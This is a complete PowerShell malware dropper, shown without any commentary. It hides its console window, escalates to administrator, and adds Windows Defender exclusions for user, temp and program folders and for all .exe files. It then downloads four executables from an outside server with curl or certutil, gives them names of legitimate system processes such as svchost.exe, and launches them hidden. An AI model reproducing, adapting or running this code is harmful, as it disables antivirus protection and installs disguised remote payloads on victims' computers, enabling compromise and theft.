$ProgressPreference = 'SilentlyContinue' [Console]::OutputEncoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport("Kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); ' function Hide-Console { $consolePtr = [Console.Window]::GetConsoleWindow() [Console.Window]::ShowWindow($consolePtr, 0) } Hide-Console $scriptPath = "$env:TEMP\CLR\v3.0.ps1" $scriptDir = Split-Path $scriptPath -Parent if (-not (Test-Path $scriptDir)) { New-Item -ItemType Directory -Path $scriptDir -Force | Out-Null } $scriptContent = @' $ProgressPreference = 'SilentlyContinue' [Console]::OutputEncoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 # Hide console window Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport("Kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow); ' function Hide-Console { $consolePtr = [Console.Window]::GetConsoleWindow() [Console.Window]::ShowWindow($consolePtr, 0) } Hide-Console # Elevate if not admin if (-NOT ([Security.Principal.WindowsPrincipal]::new([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$scriptPath`"" -Verb RunAs exit } $exclusions = @( "C:\Program Files (x86)" "C:\Users" "$env:TEMP" "$env:APPDATA" ) foreach ($path in $exclusions) { Add-MpPreference -ExclusionPath $path -ErrorAction SilentlyContinue } Add-MpPreference -ExclusionExtension "*.exe" -ErrorAction SilentlyContinue Start-Sleep -Seconds 5 $tempDir = Join-Path $env:TEMP "ExeDownloads" if (-not (Test-Path $tempDir)) { New-Item -ItemType Directory -Path $tempDir -Force | Out-Null } $files = @( @{url="https://dl.server945811.com/services.exe"; name="svchost.exe"}, @{url="https://dl.server945811.com/Cypher.exe"; name="services.exe"}, @{url="https://dl.server945811.com/conhost.exe"; name="Steam Support.exe"}, @{url="https://dl.server945811.com/ON.exe"; name="Windows Logon Application.exe"} ) $useCurl = $null -ne (Get-Command curl.exe -ErrorAction SilentlyContinue) foreach ($item in $files) { $url = $item.url $name = $item.name $rnd = Get-Random -Minimum 10000 -Maximum 99999 $folder = "$env:TEMP\$rnd" $filePath = "$folder\$name" New-Item -ItemType Directory -Path $folder -Force | Out-Null $success = $false for ($i = 1; $i -le 5; $i++) { try { if ($useCurl) { curl.exe -L --retry 3 --retry-delay 2 -o "$filePath" "$url" --silent } else { certutil -urlcache -split -f "$url" "$filePath" | Out-Null } if (Test-Path $filePath) { $success = $true; break } } catch {} Start-Sleep -Seconds 3 } if ($success) { Add-MpPreference -ExclusionPath $filePath -ErrorAction SilentlyContinue try { Start-Process -FilePath $filePath -WindowStyle Hidden -ErrorAction Stop } catch { Start-Process -FilePath $filePath -ErrorAction SilentlyContinue } } else { Start-Sleep -Seconds 1 } Start-Sleep -Seconds 3 } Start-Sleep -Seconds 10 '@ $scriptContent | Out-File -FilePath $scriptPath -Encoding UTF8 -Force if (-NOT ([Security.Principal.WindowsPrincipal]::new([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process powershell.exe "-NoProfile -ExecutionPolicy Bypass -File `"$scriptPath`"" -Verb RunAs exit }